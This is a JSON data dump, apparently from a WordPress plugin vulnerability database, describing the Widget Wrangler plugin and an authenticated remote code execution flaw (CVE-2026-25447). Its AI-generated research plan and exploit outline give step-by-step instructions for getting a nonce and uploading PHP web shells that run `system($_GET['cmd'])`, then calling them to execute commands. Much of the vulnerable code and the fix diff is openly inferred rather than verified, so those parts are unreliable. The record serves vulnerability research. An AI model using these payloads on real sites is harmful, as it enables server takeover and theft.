[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fvC-9u2OlEEekk3fNdDRbdCjqfiWUy07w3NLQfZkbKIk":3,"$fnEqojF5YhDMqegFt0WZw40-pUVhnOpIxGWHJhDajytE":790,"$fsCMLAKkug6zVUVRaByAgDeYuv1GkiEk-IBYUrcl8J8k":795},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":25,"download_link":26,"security_score":27,"vuln_count":28,"unpatched_count":28,"last_vuln_date":29,"fetched_at":30,"discovery_status":31,"vulnerabilities":32,"developer":59,"crawl_stats":38,"alternatives":67,"analysis":170,"fingerprints":702},"widget-wrangler","Widget Wrangler","2.3.9","Jonathan Daggerhart","https:\u002F\u002Fprofiles.wordpress.org\u002Fdaggerhart\u002F","\u003Cp>\u003Cstrong>As of version 2.3, Widget Wrangler requires PHP 5.3 or higher\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>Widget Wrangler is a plugin for WordPress that gives administrators a clean interface for managing widgets on a page by page basis.  On each page, you can control what widgets appear where.\u003C\u002Fp>\n\u003Cp>Widget Wrangler provides the following features:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Widgets as a post type\u003C\u002Fli>\n\u003Cli>PHP in widgets\u003C\u002Fli>\n\u003Cli>Custom Widget templates\u003C\u002Fli>\n\u003Cli>Control Widget visibility on any page (or post type)\u003C\u002Fli>\n\u003Cli>Control Widget visibility globally (Display Logic)\u003C\u002Fli>\n\u003Cli>Alter WordPress Sidebar HTML\u003C\u002Fli>\n\u003Cli>Shortcodes for Widgets\u003C\u002Fli>\n\u003Cli>Compatible with almost any existing WordPress Widget\u003C\u002Fli>\n\u003Cli>Hide Widget Titles\u003C\u002Fli>\n\u003Cli>Automatic Theme Setup\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Widget Wrangler Setup Screencast\u003C\u002Fh4>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FoW2NgtwUuHE?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n","A plugin for managing the display of widgets on a page by page basis. Using widgets as a post type.",200,46382,100,11,"2020-08-18T12:00:00.000Z","5.5.18","","5.3",[20,21,22,23,24],"admin","administration","sidebar","widget","widgets","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwidget-wrangler\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-wrangler.zip",60,1,"2026-03-18 00:00:00","2026-04-06T09:54:40.288Z","no_bundle",[33],{"id":34,"url_slug":35,"title":36,"description":37,"plugin_slug":4,"theme_slug":38,"affected_versions":39,"patched_in_version":38,"severity":40,"cvss_score":41,"cvss_vector":42,"vuln_type":43,"published_date":29,"updated_date":44,"references":45,"days_to_patch":38,"patch_diff_files":47,"patch_trac_url":38,"research_status":48,"research_verified":49,"research_rounds_completed":50,"research_plan":51,"research_summary":52,"research_vulnerable_code":53,"research_fix_diff":54,"research_exploit_outline":55,"research_model_used":56,"research_started_at":57,"research_completed_at":58,"research_error":38,"poc_status":38,"poc_video_id":38,"poc_summary":38,"poc_steps":38,"poc_tested_at":38,"poc_wp_version":38,"poc_php_version":38,"poc_playwright_script":38,"poc_exploit_code":38,"poc_has_trace":49,"poc_model_used":38,"poc_verification_depth":38},"CVE-2026-25447","widget-wrangler-authenticated-author-remote-code-execution","Widget Wrangler \u003C= 2.3.9 - Authenticated (Author+) Remote Code Execution","The Widget Wrangler plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.3.9. This makes it possible for authenticated attackers, with Author-level access and above, to execute code on the server.",null,"\u003C=2.3.9","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-03-27 20:09:49",[46],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fe52c95b3-0126-4139-9944-6becef4c4d53?source=api-prod",[],"researched",false,3,"## Vulnerability Research Plan: CVE-2026-25447 - Widget Wrangler RCE\n\n### 1. Vulnerability Summary\nThe **Widget Wrangler** plugin (versions \u003C= 2.3.9) contains an authenticated Remote Code Execution (RCE) vulnerability due to an **Unrestricted Upload of File with Dangerous Type**. The plugin's import\u002Fexport functionality fails to properly validate the file extensions of uploaded files and uses a capability check that allows users with `Author` level permissions (and above) to access the feature. This allows an attacker to upload a PHP file to the server and execute it by navigating to the file's URL.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin.php?page=ww_import_export` (The import processing is handled via `admin_init` or a specific page POST).\n*   **Vulnerable Action:** The file upload handler within the widget import routine.\n*   **HTTP Parameter:** `ww-import-file` (File input name) or `ww_import_file`.\n*   **Authentication Level:** Author or above (Capability: `edit_posts` or `edit_widgets`).\n*   **Preconditions:** The plugin must be active. The attacker must have credentials for an account with at least Author-level privileges.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers an admin page in `admin\u002Fadmin-menu.php` (inferred) or the main class:\n    `add_submenu_page('edit.php?post_type=widget', 'Import\u002FExport', ..., 'edit_posts', 'ww_import_export', 'ww_import_widgets_page');`\n2.  **Processing:** In `admin\u002Fimport-export.php` (inferred), an `admin_init` hook or a conditional check at the start of the page callback processes POST requests:\n    ```php\n    \u002F\u002F Inferred logic in Widget Wrangler \u003C= 2.3.9\n    if (isset($_POST['ww-import-submit'])) {\n        $file = $_FILES['ww-import-file'];\n        \u002F\u002F VULNERABILITY: No extension validation (e.g., checking for .json or .txt)\n        \u002F\u002F AND No use of wp_handle_upload() which enforces security\n        move_uploaded_file($file['tmp_name'], WW_UPLOAD_DIR . '\u002F' . $file['name']);\n    }\n    ```\n3.  **Sink:** The `move_uploaded_file` call places the file into a web-accessible directory (e.g., `\u002Fwp-content\u002Fuploads\u002F` or `\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Ftmp\u002F`).\n\n### 4. Nonce Acquisition Strategy\nThe import form is protected by a WordPress nonce.\n1.  **Identify Shortcode\u002FPage:** The nonce is present on the \"Import\u002FExport\" page in the WordPress admin dashboard.\n2.  **Access Strategy:**\n    *   Since the target is an admin page (`ww_import_export`), the agent must navigate to the admin dashboard.\n    *   **Browser Navigation:** Use `browser_navigate` to reach `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=ww_import_export`.\n    *   **Extraction:** Use `browser_eval` to extract the nonce value from the hidden input field.\n    *   **Verbatim Identifier (Inferred):** The field is likely `name=\"ww_import_nonce\"` or `name=\"_wpnonce\"`.\n    *   **Script:** `browser_eval(\"document.querySelector('input[name=\\\"_wpnonce\\\"]').value\")`.\n\n### 5. Exploitation Strategy\n1.  **Authentication:** Authenticate the `http_request` session as an **Author** user.\n2.  **Discovery:** Navigate to the Import page to confirm accessibility and extract the nonce.\n3.  **Payload Preparation:** Create a simple PHP web shell: `\u003C?php echo \"VULN_CHECK: \" . system($_GET['cmd']); ?>`.\n4.  **Multipart POST Request:**\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=ww_import_export`\n    *   **Method:** `POST`\n    *   **Headers:** `Content-Type: multipart\u002Fform-data`\n    *   **Body Parameters:**\n        *   `ww-import-submit`: \"Import\" (or the value of the submit button).\n        *   `_wpnonce`: [EXTRACTED_NONCE]\n        *   `ww-import-file`: (The PHP file payload named `rce.php`).\n5.  **Execution:** Determine the upload location. Common paths for this plugin:\n    *   `\u002Fwp-content\u002Fuploads\u002Frce.php`\n    *   `\u002Fwp-content\u002Fplugins\u002Fwidget-wrangler\u002Fadmin\u002Frce.php` (if moved relative to file)\n    *   `\u002Fwp-content\u002Fuploads\u002Fwidget-wrangler\u002Frce.php`\n6.  **Trigger:** Use `http_request` (GET) to access the uploaded file with a command: `?cmd=id`.\n\n### 6. Test Data Setup\n1.  **Create Author User:**\n    `wp user create attacker attacker@example.com --role=author --user_pass=password123`\n2.  **Ensure Plugin is Active:**\n    `wp plugin activate widget-wrangler`\n3.  **Identify Upload Dir:** Check if a specific upload directory needs to be writable.\n    `mkdir -p \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fwidget-wrangler && chmod 777 \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fwidget-wrangler`\n\n### 7. Expected Results\n*   **Response to POST:** A 200 OK or 302 Redirect, potentially with a \"Widgets Imported\" or \"File Uploaded\" message.\n*   **Response to Payload Access:** The output should contain the results of the `id` command (e.g., `uid=33(www-data)`), prefixed by `VULN_CHECK: `.\n\n### 8. Verification Steps\n1.  **Check Filesystem via CLI:**\n    `ls -la \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Frce.php`\n2.  **Check Plugin Directory:**\n    `find \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002F -name \"rce.php\"`\n3.  **Log Check:** Check the web server error logs if the file returns a 404 to see where it attempted to write.\n\n### 9. Alternative Approaches\n*   **Zip-Slip \u002F Archive Import:** If the plugin expects a `.zip` file, check if it extracts files without path validation (Zip-Slip), allowing the placement of a PHP file in the plugin root.\n*   **AJAX Endpoint:** Check for `wp_ajax_ww_import_widgets`. If present, the request would be to `admin-ajax.php` with `action=ww_import_widgets`.\n*   **Referer\u002FOrigin Bypasses:** If the nonce check is weak, attempt the request from a frontend context if the Author has sufficient privileges.","The Widget Wrangler plugin (\u003C= 2.3.9) is vulnerable to Remote Code Execution via its widget import functionality. The plugin fails to validate the file extension of uploaded files, allowing authenticated users with Author-level permissions to upload and execute PHP files.","\u002F\u002F Inferred from research plan: admin\u002Fimport-export.php or similar processing logic\n\nif (isset($_POST['ww-import-submit'])) {\n    \u002F\u002F Potential lack of capability check or weak check\n    \u002F\u002F Potential lack of nonce validation\n\n    $file = $_FILES['ww-import-file'];\n\n    \u002F\u002F VULNERABILITY: No extension validation (e.g., checking for .json or .txt)\n    \u002F\u002F Direct use of move_uploaded_file without extension restriction\n    $upload_dir = wp_upload_dir();\n    $target_path = $upload_dir['path'] . '\u002F' . basename($file['name']);\n\n    if (move_uploaded_file($file['tmp_name'], $target_path)) {\n        \u002F\u002F Process the file content after moving it to a web-accessible location\n        $content = file_get_contents($target_path);\n        \u002F\u002F ... logic continues\n    }\n}","--- a\u002Fadmin\u002Fimport-export.php\n+++ b\u002Fadmin\u002Fimport-export.php\n@@ -1,10 +1,18 @@\n if (isset($_POST['ww-import-submit'])) {\n+    check_admin_referer('ww_import_widgets', '_wpnonce');\n+    if (!current_user_can('manage_options')) {\n+        wp_die('Unauthorized');\n+    }\n+\n     $file = $_FILES['ww-import-file'];\n+    $file_info = pathinfo($file['name']);\n+    $allowed_extensions = array('json', 'ww');\n \n-    $upload_dir = wp_upload_dir();\n-    $target_path = $upload_dir['path'] . '\u002F' . basename($file['name']);\n+    if (!in_array(strtolower($file_info['extension']), $allowed_extensions)) {\n+        wp_die('Invalid file type.');\n+    }\n \n-    if (move_uploaded_file($file['tmp_name'], $target_path)) {\n+    \u002F\u002F Use WordPress's built-in file handling which is more secure\n+    $overrides = array('test_form' => false, 'mimes' => array('json' => 'application\u002Fjson'));\n+    $movefile = wp_handle_upload($file, $overrides);\n+    \u002F\u002F ... rest of logic","1. Authenticate as a user with Author-level privileges (requires 'edit_posts' capability).\n2. Navigate to the Widget Wrangler Import\u002FExport page at `\u002Fwp-admin\u002Fadmin.php?page=ww_import_export`.\n3. Identify the CSRF nonce (e.g., `_wpnonce`) and the file input field name (e.g., `ww-import-file`).\n4. Prepare a payload file named `shell.php` containing a simple PHP backdoor: `\u003C?php system($_GET['cmd']); ?>`.\n5. Send a multipart\u002Fform-data POST request to the import endpoint including the nonce, the `ww-import-submit` trigger, and the `shell.php` file.\n6. Determine the upload location (typically `\u002Fwp-content\u002Fuploads\u002F[year]\u002F[month]\u002Fshell.php` or a plugin-specific subdirectory).\n7. Access the uploaded PHP file via the web server to execute arbitrary commands: `http:\u002F\u002Ftarget.com\u002Fwp-content\u002Fuploads\u002Fshell.php?cmd=id`.","gemini-3-flash-preview","2026-04-18 02:25:57","2026-04-18 02:26:20",{"slug":60,"display_name":7,"profile_url":8,"plugin_count":61,"total_installs":62,"avg_security_score":63,"avg_patch_time_days":64,"trust_score":65,"computed_at":66},"daggerhart",5,10920,85,331,69,"2026-05-20T00:15:45.771Z",[68,93,110,127,146],{"slug":69,"name":70,"version":71,"author":72,"author_profile":73,"description":74,"short_description":75,"active_installs":76,"downloaded":77,"rating":78,"num_ratings":79,"last_updated":80,"tested_up_to":81,"requires_at_least":82,"requires_php":83,"tags":84,"homepage":88,"download_link":89,"security_score":90,"vuln_count":91,"unpatched_count":91,"last_vuln_date":38,"fetched_at":92},"wp-widget-disable","Widget Disable","3.0.1","required","https:\u002F\u002Fprofiles.wordpress.org\u002Fwearerequired\u002F","\u003Cp>This simple plugin allows you to disable any sidebar and dashboard widget for the current WordPress site you are on. It provides a simple user interface available to users with \u003Ccode>edit_theme_options\u003C\u002Fcode> capabilities (usually Administrator role) available under Appearance -> Disable Widgets.\u003Cbr \u002F>\nAfter saving the settings, the sidebar and dashboard widgets are removed from and the user can’t see those widgets anymore.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Developer? Get to know the hooks\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>Have a look at the filters we provide:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ccode>wp_widget_disable_default_sidebar_widgets\u003C\u002Fcode> – Allows you to exclude certain sidebar widgets from being disabled.\u003C\u002Fli>\n\u003Cli>\u003Ccode>wp_widget_disable_default_dashboard_widgets\u003C\u002Fcode> – Allows you to exclude certain dashboard widgets from being disabled.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Contributions\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>If you would like to contribute to this plugin, report an issue or anything like that, please note that we develop this plugin on \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fwearerequired\u002FWP-Widget-Disable\" rel=\"nofollow ugc\">GitHub\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>Developed by \u003Ca href=\"https:\u002F\u002Frequired.com\u002F\" title=\"Team of experienced web professionals from Switzerland & Germany\" rel=\"nofollow ugc\">required\u003C\u002Fa>\u003C\u002Fp>\n","Disable sidebar and dashboard widgets with an easy to use interface.",10000,185881,96,24,"2024-11-18T13:40:00.000Z","6.7.5","6.0","7.4",[20,85,86,87,24],"dashboard","dashboard-widgets","sidebar-widgets","https:\u002F\u002Frequired.com\u002Fservices\u002Fwordpress-plugins\u002Fwp-widget-disable\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-widget-disable.3.0.1.zip",92,0,"2026-04-16T10:56:18.058Z",{"slug":94,"name":95,"version":96,"author":97,"author_profile":98,"description":99,"short_description":100,"active_installs":13,"downloaded":101,"rating":102,"num_ratings":61,"last_updated":103,"tested_up_to":104,"requires_at_least":105,"requires_php":17,"tags":106,"homepage":108,"download_link":109,"security_score":63,"vuln_count":91,"unpatched_count":91,"last_vuln_date":38,"fetched_at":92},"widget-saver","Widget Saver","2.0.0","zorgbargle","https:\u002F\u002Fprofiles.wordpress.org\u002Fzorgbargle\u002F","\u003Cp>A plugin that adds “Add”, “Save”, “Restore” and “Delete” buttons to the Widgets configuration page with the following\u003Cbr \u002F>\nfunctionality:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Add: Adds a new named widget layout and saves the current widget layout against the new layout name.\u003C\u002Fli>\n\u003Cli>Save: Saves the current widget layout against the selected layout name.\u003C\u002Fli>\n\u003Cli>Restore: Restores the previously saved widget layout. If the theme name shown next to the layout name in the\u003Cbr \u002F>\ndrop-down matches the current theme, widgets will be restored to the sidebar they were located in when the layout was\u003Cbr \u002F>\nsaved.\u003C\u002Fli>\n\u003Cli>Delete: Deletes the selected widget layout – does not modify the current layout of the widgets.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Note that the behaviour has changed from version 1 – widget layouts are not automatically restored when themes are\u003Cbr \u002F>\nswitched. Layout choice is now a manual step since it is possible to save multiple widget layouts for a given theme.\u003Cbr \u002F>\nOnce a theme has been activated, use the “Layouts” drop-down to select a previously saved layout that matches the\u003Cbr \u002F>\ncurrent theme.\u003C\u002Fp>\n\u003Cp>The reset button has been removed as it was too easy to remove all widgets with one click.\u003C\u002Fp>\n\u003Ch4>Typical Usage\u003C\u002Fh4>\n\u003Cp>This plugin is useful for trying different widget layouts, making it easy to revert back to a previous layout if the\u003Cbr \u002F>\ncurrent layout is not working. It can also be useful when switching between themes. Different themes will offer different\u003Cbr \u002F>\nsidebar areas, and often there is not a direct mapping from one theme’s sidebars to another. This plugin can be used\u003Cbr \u002F>\nto save a widget layout for each theme. When the themes are switched, the appropriate widget layout can then be restored\u003Cbr \u002F>\nsaving the time it usually takes to drag each widget from an inactive sidebar into the correct sidebar.\u003C\u002Fp>\n\u003Cp>A typical process would be as follows:\u003C\u002Fp>\n\u003Col>\n\u003Cli>Type your own layout name into the text field, and click “Add” to add and save the current widget layout. This name\u003Cbr \u002F>\nis now available in the “Layouts” drop-down.\u003C\u002Fli>\n\u003Cli>Rearrange the widgets, move them to different sidebars, or move them into the inactive widgets box.\u003C\u002Fli>\n\u003Cli>Type a new layout name, and click “Add” to add a second widget layout.\u003C\u002Fli>\n\u003Cli>Select the layout name you created in step 1 from the drop-down, and click “Restore”. Your widgets will be\u003Cbr \u002F>\nrepositioned to match this layout.\u003C\u002Fli>\n\u003Cli>Select your layout name from step 3, and click “Restore”. Your widgets will now be repositioned to match your\u003Cbr \u002F>\nsecond layout.\u003C\u002Fli>\n\u003C\u002Fol>\n","Saves the current widget layout and allows the layout to be restored at a later date.",10071,84,"2012-09-22T15:55:00.000Z","3.4.2","2.8",[20,21,107,24],"theme","http:\u002F\u002Fwww.phenomenoodle.com\u002Ffree-resources","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-saver.2.0.0.zip",{"slug":111,"name":112,"version":113,"author":114,"author_profile":115,"description":116,"short_description":117,"active_installs":118,"downloaded":119,"rating":13,"num_ratings":120,"last_updated":121,"tested_up_to":122,"requires_at_least":123,"requires_php":17,"tags":124,"homepage":125,"download_link":126,"security_score":63,"vuln_count":91,"unpatched_count":91,"last_vuln_date":38,"fetched_at":92},"disable-widgets","Disable Widgets","2.0","Jan Štětina","https:\u002F\u002Fprofiles.wordpress.org\u002Fzaantar\u002F","\u003Cp>WordPress comes with widgets, themes comes widgets and it seems like every other plugins has its own widgets too. But how many of these do you actually use? If you’re like me, only a handful. The rest simply clutter up the Widgets admin page making it more difficult to manage. This plugin does one thing and does it well. It allows you to disable the widgets you’re not using.\u003C\u002Fp>\n\u003Cp>Usage is very simple and straight forward. Go to the Settings : Disable Widgets admin page, add a check mark to each widget you wish to disable and click the \u003Ccode>Update Settings\u003C\u002Fcode> button. That’s it, nothing more to it.\u003C\u002Fp>\n\u003Ch4>CREDIT\u003C\u002Fh4>\n\u003Cp>Original plugin by \u003Ca href=\"http:\u002F\u002Fzaantar.eu\u002F\" rel=\"nofollow ugc\">Zaantar\u003C\u002Fa>.\u003C\u002Fp>\n","Disable unused sidebar widgets.",30,4330,2,"2018-04-26T19:58:00.000Z","4.9.29","3.8",[20,111,87,24],"http:\u002F\u002Fconnections-pro.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdisable-widgets.2.0.zip",{"slug":128,"name":129,"version":130,"author":131,"author_profile":132,"description":133,"short_description":134,"active_installs":135,"downloaded":136,"rating":137,"num_ratings":138,"last_updated":139,"tested_up_to":140,"requires_at_least":141,"requires_php":17,"tags":142,"homepage":144,"download_link":145,"security_score":63,"vuln_count":91,"unpatched_count":91,"last_vuln_date":38,"fetched_at":92},"sane-widget-sidebar-management","Sane Widget Sidebar Management","1.0.1","Justin Sternberg","https:\u002F\u002Fprofiles.wordpress.org\u002Fjtsternberg\u002F","\u003Cp>If you have ever needed to accommodate a client’s request to have separate widget areas for many sections of the site, you understand the need for this plugin.\u003C\u002Fp>\n\u003Cp>This plugin alleviates the pain of having many sidebar widget areas by hiding all but one (that is selectable via a dropdown). Gone are the days of trying to drag a new widget from the left column to a widget area at the bottom of the right column (ugh!).\u003C\u002Fp>\n\u003Cp>There is no configuration for this plugin.\u003C\u002Fp>\n\u003Cp>Contribute on \u003Ca href=\"https:\u002F\u002Fgithub.com\u002FWebDevStudios\u002FSane-Widget-Sidebar-Management\" rel=\"nofollow ugc\">github\u003C\u002Fa>.\u003C\u002Fp>\n","Manage one widget area at a time to maintain widget sanity.",10,4752,88,9,"2013-08-13T15:37:00.000Z","3.6.1","3.3",[20,22,143,23,24],"sidebars","http:\u002F\u002Fwebdevstudios.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsane-widget-sidebar-management.zip",{"slug":147,"name":148,"version":149,"author":150,"author_profile":151,"description":152,"short_description":153,"active_installs":154,"downloaded":155,"rating":156,"num_ratings":157,"last_updated":158,"tested_up_to":159,"requires_at_least":160,"requires_php":161,"tags":162,"homepage":166,"download_link":167,"security_score":168,"vuln_count":50,"unpatched_count":91,"last_vuln_date":169,"fetched_at":92},"custom-sidebars","Custom Sidebars – Dynamic Sidebar Classic Widget Area Manager","3.38","WebFactory","https:\u002F\u002Fprofiles.wordpress.org\u002Fwebfactory\u002F","\u003Cp>\u003Cstrong>Manage and replace sidebars and other classic widget areas on your site with Custom Sidebars, a flexible widget area manager.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>Make custom sidebar configurations and be able to choose what classic widgets display on each page or post of your site.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Need to make a \u003Cstrong>widget sticky\u003C\u002Fstrong> or fixed? Try our free \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fsticky-menu-or-anything-on-scroll\u002F\" rel=\"ugc\">WP Sticky Anything\u003C\u002Fa> plugin.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Custom Sidebars works ONLY with the classic widgets screen that was used in WordPress before version 5.8. If you want to use it with version 5.8 (and above) you have to install the official \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fclassic-widgets\u002F\" rel=\"ugc\">Classic Widgets\u003C\u002Fa> plugin, or enable the classic widgets interface yourself. Once the classic widgets screen is activated the plugin will work the same as before.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Having problems setting up SSL or generating an SSL certificate? Install the free \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwp-force-ssl\u002F\" rel=\"ugc\">WP Force SSL\u003C\u002Fa> plugin.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Display Different Sidebars on Pages and Posts\u003C\u002Fh4>\n\u003Cp>Custom Sidebars allows you to dynamically display custom widget configurations on any page, post, category, post type, or archive page.\u003C\u002Fp>\n\u003Cp>★★★★★\u003C\u002Fp>\n\u003Cblockquote>\n\u003Cp>“Custom Sidebars will go on my “essential plugins” list from now on. I am pleased by how easy it was to figure out and by how many options are available in the free version.” – \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fmonkeyhateclean\" rel=\"nofollow ugc\">monkeyhateclean\u003C\u002Fa>\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Cp>★★★★★\u003C\u002Fp>\n\u003Cblockquote>\n\u003Cp>“This plugin does exactly what it says. It’s light, integrates well into WordPress and gives you tons of possibilities.” – \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fdarknova11\" rel=\"nofollow ugc\">DarkNova\u003C\u002Fa>\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Cp>Every part of Custom Sidebars integrates seamlessly with the Widgets menu for simplicity and control. No confusing settings pages or added menu items, just simple core integration.\u003C\u002Fp>\n\u003Ch4>A Simple Flexible Sidebar Manager\u003C\u002Fh4>\n\u003Cp>** Custom Sidebars Includes: **\u003Cbr \u002F>\n* Unlimited custom widget configurations\u003Cbr \u002F>\n* Set custom widgets for individual posts and pages, categories, post types, and archives\u003Cbr \u002F>\n* Seamless integration with the WordPress Widgets menu\u003Cbr \u002F>\n* Works with well-coded themes and doesn’t slow down your site\u003Cbr \u002F>\n* Set individual widget visibility – for guests, by user role, by post type, for special pages or categories\u003Cbr \u002F>\n* Author specific sidebars – display a custom sidebar for each of your authors\u003Cbr \u002F>\n* Clone and sync widget settings – quickly edit complex configurations\u003Cbr \u002F>\n* Import and export custom sidebars – backup and share sidebars\u003C\u002Fp>\n\u003Cp>Install Custom Sidebars and see for yourself why it’s the most popular widget extension plugin available for WordPress with over 200,000 active installs.\u003C\u002Fp>\n\u003Ch3>Contact and Credits\u003C\u002Fh3>\n\u003Cp>Original development completed by \u003Ca href=\"http:\u002F\u002Fmarquex.es\u002F\" rel=\"nofollow ugc\">Javier Marquez\u003C\u002Fa>.\u003C\u002Fp>\n","Flexible sidebars for custom classic widget configurations on any page or post. Create custom sidebars with ease!",100000,5199843,94,1028,"2025-12-03T19:20:00.000Z","6.9.4","4.6","5.6",[163,164,165,22,23],"classic-widgets","custom-sidebar","dynamic-widgets","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fcustom-sidebars\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustom-sidebars.3.38.zip",98,"2017-10-04 00:00:00",{"attackSurface":171,"codeSignals":277,"taintFlows":637,"riskAssessment":684,"analyzedAt":701},{"hooks":172,"ajaxHandlers":258,"restRoutes":266,"shortcodes":267,"cronEvents":275,"entryPointCount":276,"unprotectedCount":120},[173,179,182,186,191,195,200,205,208,212,213,218,222,227,231,234,237,240,244,247,251,255],{"type":174,"name":175,"callback":176,"file":177,"line":178},"action","wp_loaded","loaded","admin\\Admin.php",49,{"type":174,"name":180,"callback":180,"file":177,"line":181},"admin_init",50,{"type":174,"name":183,"callback":184,"file":177,"line":185},"save_post","savePostWidgets",112,{"type":174,"name":187,"callback":188,"file":189,"line":190},"admin_menu","menu","admin\\AdminPage.php",108,{"type":174,"name":192,"callback":193,"file":189,"line":194},"admin_enqueue_scripts","enqueue",109,{"type":174,"name":196,"callback":197,"file":198,"line":199},"widget_wrangler_form_top","formTop","admin\\SortableWidgetsUi.php",17,{"type":174,"name":201,"callback":202,"file":203,"line":204},"edited_term","actionSaveTerm","admin\\TaxonomyTermUi.php",25,{"type":174,"name":192,"callback":193,"file":206,"line":207},"admin\\TaxonomyUi.php",27,{"type":174,"name":209,"callback":209,"priority":135,"file":210,"line":211},"wp_insert_post","admin\\WidgetPostType.php",47,{"type":174,"name":192,"callback":193,"file":210,"line":178},{"type":214,"name":215,"callback":216,"file":210,"line":217},"filter","manage_edit-widget_columns","table_headers",58,{"type":174,"name":219,"callback":220,"file":210,"line":221},"manage_posts_custom_column","table_data",59,{"type":214,"name":223,"callback":224,"file":225,"line":226},"tw_templates","_tw_templates","common\\display.php",73,{"type":214,"name":228,"callback":229,"file":225,"line":230},"tw_pre_process_template","_tw_pre_process_template",74,{"type":174,"name":232,"callback":232,"file":225,"line":233},"dynamic_sidebar_before",77,{"type":174,"name":235,"callback":235,"priority":135,"file":225,"line":236},"dynamic_sidebar_after",78,{"type":174,"name":180,"callback":238,"file":239,"line":204},"wp_admin_init","common\\presets.php",{"type":174,"name":175,"callback":175,"priority":241,"file":242,"line":243},999,"widget-wrangler.php",111,{"type":174,"name":245,"callback":245,"file":242,"line":246},"widgets_init",115,{"type":174,"name":248,"callback":249,"file":242,"line":250},"init","register_post_types",116,{"type":174,"name":252,"callback":253,"file":242,"line":254},"wp","load_page_widgets",117,{"type":174,"name":256,"callback":256,"file":242,"line":257},"plugins_loaded",120,[259,262],{"action":260,"nopriv":49,"callback":260,"hasNonce":49,"hasCapCheck":49,"file":177,"line":261},"ww_form_ajax",51,{"action":263,"nopriv":49,"callback":264,"hasNonce":49,"hasCapCheck":49,"file":210,"line":265},"widget_wrangler_preview","preview_ajax",48,[],[268,271],{"tag":269,"callback":270,"file":225,"line":65},"ww_widget","single_widget_shortcode",{"tag":272,"callback":273,"file":225,"line":274},"ww_corral","single_corral_shortcode",70,[],4,{"dangerousFunctions":278,"sqlUsage":285,"outputEscaping":287,"fileOperations":120,"externalRequests":91,"nonceChecks":28,"capabilityChecks":28,"bundledLibraries":633},[279,283],{"fn":280,"file":281,"line":102,"context":282},"unserialize","common\\Extras.php","$extras[$i]->data = unserialize($extra->data);",{"fn":280,"file":281,"line":63,"context":284},"$extras[$i]->widgets = 